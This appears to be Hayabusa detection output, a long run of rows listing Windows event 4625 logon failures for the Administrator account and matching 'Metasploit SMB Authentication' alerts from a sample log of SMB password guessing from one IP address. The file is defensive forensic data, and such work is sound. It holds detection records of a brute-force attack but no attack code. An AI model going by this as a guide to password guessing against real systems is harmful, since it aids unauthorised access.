NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
